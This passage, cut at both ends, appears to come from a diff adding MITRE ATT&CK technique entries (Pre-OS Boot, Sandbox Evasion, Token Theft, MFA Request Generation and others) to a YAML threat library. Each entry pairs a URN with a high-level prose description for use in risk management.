(potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) + to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) + campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may + also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) + and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking) + + + By using compromised infrastructure, adversaries may make it difficult to tie + their actions back to them. Prior to targeting, adversaries may compromise the + infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) + + https://attack.mitre.org/techniques/T1584' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1542 + name: T1542 - Pre-OS Boot + provider: MITRE ATT&CK + description: 'Adversaries may abuse Pre-OS Boot mechanisms as a way to establish + persistence on a system. During the booting process of a computer, firmware + and various startup services are loaded before the operating system. These programs + control flow of execution before the operating system takes control.(Citation: + Wikipedia Booting) + + + Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic + Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to + persist on systems at a layer below the operating system. This can be particularly + difficult to detect as malware at this level will not be detected by host software-based + defenses. + + https://attack.mitre.org/techniques/T1542' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1612 + name: T1612 - Build Image on Host + provider: MITRE ATT&CK + description: "Adversaries may build a container image directly on a host to bypass\ + \ defenses that monitor for the retrieval of malicious images from a public\ + \ registry. A remote build request may be sent to the Docker API\ + \ that includes a Dockerfile that pulls a vanilla base image, such as alpine,\ + \ from a public or local registry and then builds a custom image upon it.(Citation:\ + \ Docker Build Image)\n\nAn adversary may take advantage of that build\ + \ API to build a custom image on the host that includes malware downloaded from\ + \ their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610)\ + \ using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua\ + \ Security Cloud Native Threat Report June 2021) If the base image is pulled\ + \ from a public registry, defenses will likely not detect the image as malicious\ + \ since it\u2019s a vanilla image. If the base image already resides in a local\ + \ registry, the pull may be considered even less suspicious since the image\ + \ is already in the environment.\nhttps://attack.mitre.org/techniques/T1612" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1586 + name: T1586 - Compromise Accounts + provider: MITRE ATT&CK + description: "Adversaries may compromise accounts with services that can be used\ + \ during targeting. For operations incorporating social engineering, the utilization\ + \ of an online persona may be important. Rather than creating and cultivating\ + \ accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)),\ + \ adversaries may compromise existing accounts. Utilizing an existing persona\ + \ may engender a level of trust in a potential victim if they have a relationship,\ + \ or knowledge of, the compromised persona. \n\nA variety of methods exist for\ + \ compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598),\ + \ purchasing credentials from third-party sites, brute forcing credentials (ex:\ + \ password reuse from breach credential dumps), or paying employees, suppliers\ + \ or business partners for access to credentials.(Citation: AnonHBGary)(Citation:\ + \ Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct\ + \ Reconnaissance to inform decisions about which accounts to compromise to further\ + \ their operation.\n\nPersonas may exist on a single site or across multiple\ + \ sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts\ + \ may require additional development, this could include filling out or modifying\ + \ profile information, further developing social networks, or incorporating\ + \ photos.\n\nAdversaries may directly leverage compromised email accounts for\ + \ [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).\n\ + https://attack.mitre.org/techniques/T1586" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1497 + name: T1497 - Virtualization/Sandbox Evasion + provider: MITRE ATT&CK + description: 'Adversaries may employ various means to detect and avoid virtualization + and analysis environments. This may include changing behaviors based on the + results of checks for the presence of artifacts indicative of a virtual machine + environment (VME) or sandbox. If the adversary detects a VME, they may alter + their malware to disengage from the victim or conceal the core functions of + the implant. They may also search for VME artifacts before dropping secondary + or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox + Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery + to shape follow-on behaviors.(Citation: Deloitte Environment Awareness) + + + Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) + such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, + etc.) or other system artifacts associated with analysis or virtualization. + Adversaries may also check for legitimate user activity to help determine if + it is in an analysis environment. Additional methods include use of sleep timers + or loops within malware code to avoid operating within a temporary sandbox.(Citation: + Unit 42 Pirpi July 2015) + + https://attack.mitre.org/techniques/T1497' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1102 + name: T1102 - Web Service + provider: MITRE ATT&CK + description: 'Adversaries may use an existing, legitimate external Web service + as a means for relaying data to/from a compromised system. Popular websites + and social media acting as a mechanism for C2 may give a significant amount + of cover due to the likelihood that hosts within a network are already communicating + with them prior to a compromise. Using common services, such as those offered + by Google or Twitter, makes it easier for adversaries to hide in expected noise. + Web service providers commonly use SSL/TLS encryption, giving adversaries an + added level of protection. + + + Use of Web services may also protect back-end C2 infrastructure from discovery + through malware binary analysis while also enabling operational resiliency (since + this infrastructure may be dynamically changed). + + https://attack.mitre.org/techniques/T1102' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1608 + name: T1608 - Stage Capabilities + provider: MITRE ATT&CK + description: 'Adversaries may upload, install, or otherwise set up capabilities + that can be used during targeting. To support their operations, an adversary + may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) + or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) + and stage them on infrastructure under their control. These capabilities may + be staged on infrastructure that was previously purchased/rented by the adversary + ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was + otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). + Capabilities may also be staged on web services, such as GitHub or Pastebin, + or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision + applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos + Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope + GCP Redirection)(Citation: Netskope Cloud Phishing) + + + Staging of capabilities can aid the adversary in a number of initial access + and post-compromise behaviors, including (but not limited to): + + + * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) + when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: + Gallagher 2015)(Citation: ATT ScanBox) + + * Staging web resources for a link target to be used with spearphishing.(Citation: + Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September + 2019) + + * Uploading malware or tools to a location accessible to a victim network to + enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: + Volexity Ocean Lotus November 2020) + + * Installing a previously acquired SSL/TLS certificate to use to encrypt command + and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) + with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: + DigiCert Install SSL Cert) + + https://attack.mitre.org/techniques/T1608' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1104 + name: T1104 - Multi-Stage Channels + provider: MITRE ATT&CK + description: 'Adversaries may create multiple stages for command and control that + are employed under different conditions or for certain functions. Use of multiple + stages may obfuscate the command and control channel to make detection more + difficult. + + + Remote access tools will call back to the first-stage command and control server + for instructions. The first stage may have automated capabilities to collect + basic host information, update tools, and upload additional files. A second + remote access tool (RAT) could be uploaded at that point to redirect the host + to the second-stage command and control server. The second stage will likely + be more fully featured and allow the adversary to interact with the system through + a reverse shell and additional RAT features. + + + The different stages will likely be hosted separately with no overlapping infrastructure. + The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) + in case the original first-stage communication path is discovered and blocked. + + https://attack.mitre.org/techniques/T1104' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1657 + name: T1657 - Financial Theft + provider: MITRE ATT&CK + description: "Adversaries may steal monetary resources from targets through extortion,\ + \ social engineering, technical theft, or other methods aimed at their own financial\ + \ gain at the expense of the availability of these resources for victims. Financial\ + \ theft is the ultimate objective of several popular campaign types including\ + \ extortion by ransomware,(Citation: FBI-ransomware) business email compromise\ + \ (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig\ + \ butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency\ + \ networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586)\ + \ to conduct unauthorized transfers of funds.(Citation: Internet crime report\ + \ 2022) In the case of business email compromise or email fraud, an adversary\ + \ may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of\ + \ a trusted entity. Once the social engineering is successful, victims can be\ + \ deceived into sending money to financial accounts controlled by an adversary.(Citation:\ + \ FBI-BEC) This creates the potential for multiple victims (i.e., compromised\ + \ accounts as well as the ultimate monetary loss) in incidents involving financial\ + \ theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when\ + \ an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)\ + \ (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010)\ + \ of data, followed by threatening public exposure unless payment is made to\ + \ the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense\ + \ business impact of financial theft, an adversary may abuse the possibility\ + \ of financial theft and seeking monetary gain to divert attention from their\ + \ true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485)\ + \ and business disruption.(Citation: AP-NotPetya)\nhttps://attack.mitre.org/techniques/T1657" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1480 + name: T1480 - Execution Guardrails + provider: MITRE ATT&CK + description: "Adversaries may use execution guardrails to constrain execution\ + \ or actions based on adversary supplied and environment specific conditions\ + \ that are expected to be present on the target. Guardrails ensure that a payload\ + \ only executes against an intended target and reduces collateral damage from\ + \ an adversary\u2019s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values\ + \ an adversary can provide about a target system or environment to use as guardrails\ + \ may include specific network share names, attached physical devices, files,\ + \ joined Active Directory (AD) domains, and local/external IP addresses.(Citation:\ + \ FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of\ + \ capabilities in environments that are not intended to be compromised or operated\ + \ within. This use of guardrails is distinct from typical [Virtualization/Sandbox\ + \ Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox\ + \ Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for\ + \ known sandbox values and continuing with execution only if there is no match,\ + \ the use of guardrails will involve checking for an expected target-specific\ + \ value and only continuing with execution if there is such a match.\nhttps://attack.mitre.org/techniques/T1480" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1619 + name: T1619 - Cloud Storage Object Discovery + provider: MITRE ATT&CK + description: 'Adversaries may enumerate objects in cloud storage infrastructure. + Adversaries may use this information during automated discovery to shape follow-on + behaviors, including requesting all or specific objects from cloud storage. Similar + to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) + on a local host, after identifying available storage services (i.e. [Cloud Infrastructure + Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access + the contents/objects stored in cloud infrastructure. + + + Cloud service providers offer APIs allowing users to enumerate objects stored + within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) + and List Blobs in Azure(Citation: List Blobs) . + + https://attack.mitre.org/techniques/T1619' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1654 + name: T1654 - Log Enumeration + provider: MITRE ATT&CK + description: "Adversaries may enumerate system and service logs to find useful\ + \ data. These logs may highlight various types of valuable insights for an adversary,\ + \ such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)),\ + \ security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)),\ + \ or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).\n\ + \nHost binaries may be leveraged to collect system logs. Examples include using\ + \ `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001)\ + \ on Windows to access and/or export security event information.(Citation: WithSecure\ + \ Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges\ + \ as novel threat actor) In cloud environments, adversaries may leverage utilities\ + \ such as the Azure VM Agent\u2019s `CollectGuestLogs.exe` to collect security\ + \ logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of\ + \ the Microsoft Azure Serial Console)\n\nAdversaries may also target centralized\ + \ logging infrastructure such as SIEMs. Logs may also be bulk exported and sent\ + \ to adversary-controlled infrastructure for offline analysis.\nhttps://attack.mitre.org/techniques/T1654" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1528 + name: T1528 - Steal Application Access Token + provider: MITRE ATT&CK + description: "Adversaries can steal application access tokens as a means of acquiring\ + \ credentials to access remote systems and resources.\n\nApplication access\ + \ tokens are used to make authorized API requests on behalf of a user or service\ + \ and are commonly used as a way to access resources in cloud and container-based\ + \ applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should\ + \ Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented\ + \ framework that issues tokens to users for access to systems. Adversaries who\ + \ steal account API tokens in cloud and containerized environments may be able\ + \ to access data and perform actions with the permissions of these accounts,\ + \ which can lead to privilege escalation and further compromise of the environment.\n\ + \nIn Kubernetes environments, processes running inside a container communicate\ + \ with the Kubernetes API server using service account tokens. If a container\ + \ is compromised, an attacker may be able to steal the container\u2019s token\ + \ and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service\ + \ Accounts)\n\nToken theft can also occur through social engineering, in which\ + \ case user action may be required to grant access. An application desiring\ + \ access to cloud-based services or protected APIs can gain entry using OAuth\ + \ 2.0 through a variety of authorization protocols. An example commonly-used\ + \ sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft\ + \ Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization\ + \ flow - June 2019) An OAuth access token enables a third-party application\ + \ to interact with resources containing user data in the ways requested by the\ + \ application without obtaining user credentials. \n \nAdversaries can leverage\ + \ OAuth authorization by constructing a malicious application designed to be\ + \ granted access to resources with the target user's OAuth token.(Citation:\ + \ Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm\ + \ OAuth 2017) The adversary will need to complete registration of their application\ + \ with the authorization server, for example Microsoft Identity Platform using\ + \ Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell,\ + \ or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019)\ + \ Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)\ + \ to the target user to entice them to grant access to the application. Once\ + \ the OAuth access token is granted, the application can gain potentially long-term\ + \ access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation:\ + \ Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nApplication access tokens\ + \ may function within a limited lifetime, limiting how long an adversary can\ + \ utilize the stolen token. However, in some cases, adversaries can also steal\ + \ application refresh tokens(Citation: Auth0 Understanding Refresh Tokens),\ + \ allowing them to obtain new access tokens without prompting the user.\nhttps://attack.mitre.org/techniques/T1528" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1204 + name: T1204 - User Execution + provider: MITRE ATT&CK + description: 'An adversary may rely upon specific actions by a user in order to + gain execution. Users may be subjected to social engineering to get them to + execute malicious code by, for example, opening a malicious document file or + link. These user actions will typically be observed as follow-on behavior from + forms of [Phishing](https://attack.mitre.org/techniques/T1566). + + + While [User Execution](https://attack.mitre.org/techniques/T1204) frequently + occurs shortly after Initial Access it may occur at other phases of an intrusion, + such as when an adversary places a file in a shared directory or on a user''s + desktop hoping that a user will click on it. This activity may also be seen + shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). + + + Adversaries may also deceive users into performing actions such as enabling + [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing + direct control of the system to the adversary, or downloading and executing + malware for [User Execution](https://attack.mitre.org/techniques/T1204). For + example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), + vishing, or various forms of user interaction. Adversaries can use a combination + of these methods, such as spoofing and promoting toll-free numbers or call centers + that are used to direct victims to malicious websites, to deliver and execute + payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: + Telephone Attack Delivery) + + https://attack.mitre.org/techniques/T1204' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1057 + name: T1057 - Process Discovery + provider: MITRE ATT&CK + description: 'Adversaries may attempt to get information about running processes + on a system. Information obtained could be used to gain an understanding of + common software/applications running on systems within the network. Adversaries + may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) + during automated discovery to shape follow-on behaviors, including whether or + not the adversary fully infects the target and/or attempts specific actions. + + + In Windows environments, adversaries could obtain details on running processes + using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) + or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). + Information about processes can also be extracted from the output of [Native + API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. + In Mac and Linux, this is accomplished with the ps command. Adversaries + may also opt to enumerate processes via /proc. + + + On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) + commands such as `show processes` can be used to display current running processes.(Citation: + US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd) + + https://attack.mitre.org/techniques/T1057' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1072 + name: T1072 - Software Deployment Tools + provider: MITRE ATT&CK + description: "Adversaries may gain access to and use third-party software suites\ + \ installed within an enterprise network, such as administration, monitoring,\ + \ and deployment systems, to move laterally through the network. Third-party\ + \ applications and software deployment systems may be in use in the network\ + \ environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).\ + \ \n\nAccess to a third-party network-wide or enterprise-wide software system\ + \ may enable an adversary to have remote code execution on all systems that\ + \ are connected to such a system. The access may be used to laterally move to\ + \ other systems, gather information, or cause a specific effect, such as wiping\ + \ the hard drives on all endpoints. Network infrastructure may also have administration\ + \ tools that can be similarly abused by adversaries. (Citation: Fortinet Zero-Day\ + \ and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)\n\ + \nThe permissions required for this action vary by system configuration; local\ + \ credentials may be sufficient with direct access to the third-party system,\ + \ or specific domain credentials may be required. However, the system may require\ + \ an administrative account to log in or to perform it's intended purpose.\n\ + https://attack.mitre.org/techniques/T1072" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1041 + name: T1041 - Exfiltration Over C2 Channel + provider: MITRE ATT&CK + description: 'Adversaries may steal data by exfiltrating it over an existing command + and control channel. Stolen data is encoded into the normal communications channel + using the same protocol as command and control communications. + + https://attack.mitre.org/techniques/T1041' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1591 + name: T1591 - Gather Victim Org Information + provider: MITRE ATT&CK + description: 'Adversaries may gather information about the victim''s organization + that can be used during targeting. Information about an organization may include + a variety of details, including the names of divisions/departments, specifics + of business operations, as well as the roles and responsibilities of key employees. + + + Adversaries may gather this information in various ways, such as direct elicitation + via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information + about an organization may also be exposed to adversaries via online or other + accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) + or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: + ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information + may reveal opportunities for other forms of reconnaissance (ex: [Phishing for + Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), + establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) + or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or + initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or + [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + + https://attack.mitre.org/techniques/T1591' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1606 + name: T1606 - Forge Web Credentials + provider: MITRE ATT&CK + description: 'Adversaries may forge credential materials that can be used to gain + access to web applications or Internet services. Web applications and services + (hosted in cloud SaaS environments or on-premise servers) often use session + cookies, tokens, or other materials to authenticate and authorize user access. + + + Adversaries may generate these credential materials in order to gain access + to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), + [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), + and other similar behaviors in that the credentials are new and forged by the + adversary, rather than stolen or intercepted from legitimate users. + + + The generation of web credentials often requires secret values, such as passwords, + [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic + seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may + also forge tokens by taking advantage of features such as the `AssumeRole` and + `GetFederationToken` APIs in AWS, which allow users to request temporary security + credentials (i.e., [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005)), + or the `zmprov gdpak` command in Zimbra, which generates a pre-authentication + key that can be used to generate tokens for any user in the domain.(Citation: + AWS Temporary Security Credentials)(Citation: Zimbra Preauth) + + + Once forged, adversaries may use these web credentials to access resources (ex: + [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), + which may bypass multi-factor and other authentication protection mechanisms.(Citation: + Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: + Microsoft SolarWinds Customer Guidance) + + https://attack.mitre.org/techniques/T1606' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1621 + name: T1621 - Multi-Factor Authentication Request Generation + provider: MITRE ATT&CK + description: "Adversaries may attempt to bypass multi-factor authentication (MFA)\ + \ mechanisms and gain access to accounts by generating MFA requests sent to\ + \ users.\n\nAdversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078)\ + \ may be unable to complete the login process if they lack access to the 2FA\ + \ or MFA mechanisms required as an additional credential and security control.\ + \ To circumvent this, adversaries may abuse the automatic generation of push\ + \ notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta,\ + \ or similar services to have the user grant access to their account.\n\nIn\ + \ some cases, adversaries may continuously repeat login attempts in order to\ + \ bombard users with MFA push notifications, SMS messages, and phone calls,\ + \ potentially resulting in the user finally accepting the authentication request\ + \ in response to \u201CMFA fatigue.\u201D(Citation: Russian 2FA Push Annoyance\ + \ - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected\ + \ Russian Activity Targeting Government and Business Entities Around the Globe)\n\ + https://attack.mitre.org/techniques/T1621" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1554 + name: T1554 - Compromise Client Software Binary + provider: MITRE ATT&CK + description: "Adversaries may modify client software binaries to establish persistent\ + \ access to systems. Client software enables users to access services provided\ + \ by a server. Common client software types are SSH clients, FTP clients, email\ + \ clients, and web browsers.\n\nAdversaries may make modifications to client\ + \ software binaries to carry out malicious tasks when those applications are\ + \ in use. For example, an adversary may copy source code for the client software,\ + \ add a backdoor, compile for the target, and replace the legitimate application\ + \ binary (or support files) with the backdoored one. An adversary may also modify\ + \ an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry\ + \ point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the\ + \ binary\u2019s legitimate execution. For example, an adversary may modify the\ + \ entry point of a binary to point to malicious code patched in by the adversary\ + \ before resuming normal execution flow.(Citation: ESET FontOnLake Analysis\ + \ 2021)\n\nSince these applications may be routinely executed by the user, the\ + \ adversary can leverage this for persistent access to the host.\nhttps://attack.mitre.org/techniques/T1554" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1212 + name: T1212 - Exploitation for Credential Access + provider: MITRE ATT&CK + description: "Adversaries may exploit software vulnerabilities in an attempt to\ + \ collect credentials. Exploitation of a software vulnerability occurs when\ + \ an adversary takes advantage of a programming error in a program, service,\ + \ or within the operating system software or kernel itself to execute adversary-controlled\ + \ code.\_\n\nCredentialing and authentication mechanisms may be targeted for\ + \ exploitation by adversaries as a means to gain access to useful credentials\ + \ or circumvent the process to gain authenticated access to systems. One example\ + \ of this is `MS14-068`, which targets Kerberos and can be used to forge Kerberos\ + \ tickets using domain user permissions.(Citation: Technet MS14-068)(Citation:\ + \ ADSecurity Detecting Forged Tickets) Another example of this is replay attacks,\ + \ in which the adversary intercepts data packets sent between parties and then\ + \ later replays these packets. If services don't properly validate authentication\ + \ requests, these replayed packets may allow an adversary to impersonate one\ + \ of the parties and gain unauthorized access or privileges.(Citation: Bugcrowd\ + \ Replay Attack)(Citation: Comparitech Replay Attack)(Citation: Microsoft Midnight\ + \ Blizzard Replay Attack)\n\nSuch exploitation has been demonstrated in cloud\ + \ environments as well. For example, adversaries have exploited vulnerabilities\ + \ in public cloud infrastructure that allowed for unintended authentication\ + \ token creation and renewal.(Citation: Storm-0558 techniques for unauthorized\ + \ email access)\n\nExploitation for credential access may also result in Privilege\ + \ Escalation depending on the process targeted or credentials obtained.\nhttps://attack.mitre.org/techniques/T1212" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1590 + name: T1590 - Gather Victim Network Information + provider: MITRE ATT&CK + description: 'Adversaries may gather information about the victim''s networks + that can be used during targeting. Information about networks may include a + variety of details, including administrative data (ex: IP ranges, domain names, + etc.) as well as specifics regarding its topology and operations. + + + Adversaries may gather this information in various ways, such as direct collection + actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or + [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information + about networks may also be exposed to adversaries via online or other accessible + data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: + WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information + may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) + or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), + establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) + or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), + and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + + https://attack.mitre.org/techniques/T1590' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1210 + name: T1210 - Exploitation of Remote Services + provider: MITRE ATT&CK + description: "Adversaries may exploit remote services to gain unauthorized access\ + \ to internal systems once inside of a network. Exploitation of a software vulnerability\ + \ occurs when an adversary takes advantage of a programming error in a program,\ + \ service, or within the operating system software or kernel itself to execute\ + \ adversary-controlled code.\_A common goal for post-compromise exploitation\ + \ of remote services is for lateral movement to enable access to a remote system.\n\ + \nAn adversary may need to determine if the remote system is in a vulnerable\ + \ state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046)\ + \ or other Discovery methods looking for common, vulnerable software that may\ + \ be deployed in the network, the lack of certain patches that may indicate\ + \ vulnerabilities, or security software that may be used to detect or contain\ + \ remote exploitation. Servers are likely a high value target for lateral movement\ + \ exploitation, but endpoint systems may also be at risk if they provide an\ + \ advantage or access to additional resources.\n\nThere are several well-known\ + \ vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple\ + \ SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications\ + \ that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662)\ + \ and web server services.(Citation: NVD CVE-2014-7169)\n\nDepending on the\ + \ permissions level of the vulnerable remote service an adversary may achieve\ + \ [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)\ + \ as a result of lateral movement exploitation as well.\nhttps://attack.mitre.org/techniques/T1210" + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1534 + name: T1534 - Internal Spearphishing + provider: MITRE ATT&CK + description: 'Adversaries may use internal spearphishing to gain access to additional + information or exploit other users within the same organization after they already + have access to accounts or systems within the environment. Internal spearphishing + is multi-staged campaign where an email account is owned either by controlling + the user''s device with previously installed malware or by compromising the + account credentials of the user. Adversaries attempt to take advantage of a + trusted internal account to increase the likelihood of tricking the target into + falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from + the Inside 2017) + + + Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) + or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part + of internal spearphishing to deliver a payload or redirect to an external site + to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) + on sites that mimic email login interfaces. + + + There have been notable incidents where internal spearphishing has been used. + The Eye Pyramid campaign used phishing emails with malicious attachments for + lateral movement between victims, compromising nearly 18,000 email accounts + in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) + The Syrian Electronic Army (SEA) compromised email accounts at the Financial + Times (FT) to steal additional account credentials. Once FT learned of the campaign + and began warning employees of the threat, the SEA sent phishing emails mimicking + the Financial Times IT department and were able to compromise even more users.(Citation: + THE FINANCIAL TIMES LTD 2019.) + + https://attack.mitre.org/techniques/T1534' + version: '1.0' + - urn: urn:intuitem:risk:threat:mitre-attack:T1199 + name: T1199 - Trusted Relationship + provider: MITRE ATT&CK + description: 'Adversaries may breach or otherwise leverage organizations who have + access to intended victims. Access through trusted third party relationship + abuses an existing connection that may not be protected or receives less scrutiny + than standard mechanisms of gaining access to a network. + + + Organizations often grant elevated access to second or third-party external + providers in order to allow them to manage internal systems as well as cloud-based + environments. Some examples of these relationships include IT services contractors, + managed security providers, infrastructure contractors (e.g. HVAC, elevators, + physical security). The third-party provider''s access may 